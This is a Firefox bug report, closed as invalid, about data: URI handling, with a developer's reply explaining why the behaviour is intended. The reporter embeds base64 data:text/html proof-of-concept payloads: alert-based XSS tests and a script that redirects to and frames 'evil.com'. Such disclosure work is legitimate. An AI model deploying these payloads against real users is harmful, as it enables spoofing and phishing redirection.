Closed
Bug 1351018
Opened 8 years ago
Closed 8 years ago
Data Scheme URI + Automatic Download
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: anasmahmood999, Unassigned)
Details
Attachments
(1 file)
|
6.17 MB,
video/avi
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507
Firefox for Android
Steps to reproduce:
The Data URI Scheme executes script using ‘text/html’, which makes the browser render it as a webpage.
Hacker or Attacker can perform several types of malware attack through the advantage of Data URI Scheme which could result in UXSS , Open Redirection, Spoofing and others.
http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg%3D%3D&t=NWI3MzFjMDEzYmI5ZTQzMjJlNzhmOTNhYjJkMWQ1ZTYyMzVlYjAyNiw5OXlxQ2FuOQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158706726327%2Fpoc-click-me-poc-click-me&m=1
http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bwww.WHAK.com%3Bcharset%3DUS-ASCII%3Bbase64%2CPHRpdGxlPkV2aWwuY29tPC90aXRsZT4gCjxzY3JpcHQ%2BCmZ1bmN0aW9uIFRpbWVyKGNhbGxiYWNrLCBkZWxheSkgewogICAgdmFyIHRpbWVySWQsIHN0YXJ0LCByZW1haW5pbmcgPSBkZWxheTsKCiAgICB0aGlzLnBhdXNlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgd2luZG93LmNsZWFyVGltZW91dCh0aW1lcklkKTsKICAgICAgICByZW1haW5pbmcgLT0gbmV3IERhdGUoKSAtIHN0YXJ0OwogICAgfTsKCiAgICB0aGlzLnJlc3VtZSA9IGZ1bmN0aW9uKCkgewogICAgICAgIHN0YXJ0ID0gbmV3IERhdGUoKTsKICAgICAgICB3aW5kb3cuY2xlYXJUaW1lb3V0KHRpbWVySWQpOwogICAgICAgIHRpbWVySWQgPSB3aW5kb3cuc2V0VGltZW91dChjYWxsYmFjaywgcmVtYWluaW5nKTsKICAgIH07CgogICAgdGhpcy5yZXN1bWUoKTsKfQoKdmFyIHRpbWVyID0gbmV3IFRpbWVyKGZ1bmN0aW9uKCkgewogICBsb2NhdGlvbi5yZXBsYWNlKCJodHRwOi8vd3d3LmV2aWwuY29tIik7Cn0sIDUwMDApOwoKCnRpbWVyLnBhdXNlKCk7Ci8vIERvIHNvbWUgc3R1ZmYuLi4KdGltZXIucmVzdW1lKCk7Cjwvc2NyaXB0PjxpZnJhbWUgIHN0eWxlPSJtYXJnaW46MDtib3JkZXI6bm9uZTsiIGhlaWdodD0xMDAlIHdpZHRoPTEwMCUgc3JjPSJodHRwOi8vd3d3LmV2aWwuY29tIjs8L2lmcmFtZT4%3D&t=ZGEwMmJiY2E4ZTM2MzUyNTIwZjEwMjU5MDgxNDA4OTZlMjBiZTkwNSxLdlV5WUlyeQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158777600262%2Fpoc-click-me-poc-click-me&m=1
http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bwww.WHAK.com%3Bcharset%3DUS-ASCII%3Bbase64%2CPHRpdGxlPkV2aWwuY29tPC90aXRsZT4gCjxzY3JpcHQ%2BCmZ1bmN0aW9uIFRpbWVyKGNhbGxiYWNrLCBkZWxheSkgewogICAgdmFyIHRpbWVySWQsIHN0YXJ0LCByZW1haW5pbmcgPSBkZWxheTsKCiAgICB0aGlzLnBhdXNlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgd2luZG93LmNsZWFyVGltZW91dCh0aW1lcklkKTsKICAgICAgICByZW1haW5pbmcgLT0gbmV3IERhdGUoKSAtIHN0YXJ0OwogICAgfTsKCiAgICB0aGlzLnJlc3VtZSA9IGZ1bmN0aW9uKCkgewogICAgICAgIHN0YXJ0ID0gbmV3IERhdGUoKTsKICAgICAgICB3aW5kb3cuY2xlYXJUaW1lb3V0KHRpbWVySWQpOwogICAgICAgIHRpbWVySWQgPSB3aW5kb3cuc2V0VGltZW91dChjYWxsYmFjaywgcmVtYWluaW5nKTsKICAgIH07CgogICAgdGhpcy5yZXN1bWUoKTsKfQoKdmFyIHRpbWVyID0gbmV3IFRpbWVyKGZ1bmN0aW9uKCkgewogICBhbGVydCgyKTsKfSwgNTAwMCk7CgoKdGltZXIucGF1c2UoKTsKLy8gRG8gc29tZSBzdHVmZi4uLgp0aW1lci5yZXN1bWUoKTsKPC9zY3JpcHQ%2BPGlmcmFtZSAgc3R5bGU9Im1hcmdpbjowO2JvcmRlcjpub25lOyIgaGVpZ2h0PTEwMCUgd2lkdGg9MTAwJSBzcmM9Imh0dHA6Ly93d3cuZXZpbC5jb20iOzwvaWZyYW1lPg%3D%3D&t=MjkwNjcxMTNlMGZmMWFiMDhjMDhkNThmZjhmZjBlOGJiMzM1Njk2ZCxLdlV5WUlyeQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158777600262%2Fpoc-click-me-poc-click-me&m=1
We can do everything with data URI
OK...
Now today when I playing with data URIs and type the uri in search bar of browser "daTa:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%23http://" browser download it as a file .
This occurs due to (;) url encode (%3B) after html .
http://t.umblr.com/redirect?z=daTa%3Atext%2Fhtml%253Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%2523http%3A%2F%2F&t=OWMxNDQ2NmQ0NTM0M2FmZjU1NjEyNjgyMDk4NmJhM2JiMDk3MmYyOCxrTGdCU2ZnRQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158898456792%2Fclick&m=1
Through this attacker can take advantage and malicious file downloads in victim PC.
This vulnerability exist in all version of Firefox 52 latest.
I also check this bug on other browsers but this only exist in Mozilla Firefox .
Actual results:
URI Download
Expected results:
URI should Not download
|
||
Comment 1•8 years ago
|
||
This appears to be working as specified. We are exploring changing the URL inheritance of data: URIs in other bugs.
In your second issue there are several legitimate ways to trigger a download; this is not a danger. You could, for example, use data:application/octet-stream;base64,blablah. In your case the %3B makes us see "html%3bbase64" run together. Since we don't have a handler for that content-type we offer to download it in case the user has a local program that can handle it. A web page could also use the "download" attribute on a link to force a download for whatever type of URL it is.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
You need to log in
before you can comment on or make changes to this bug.
Description
•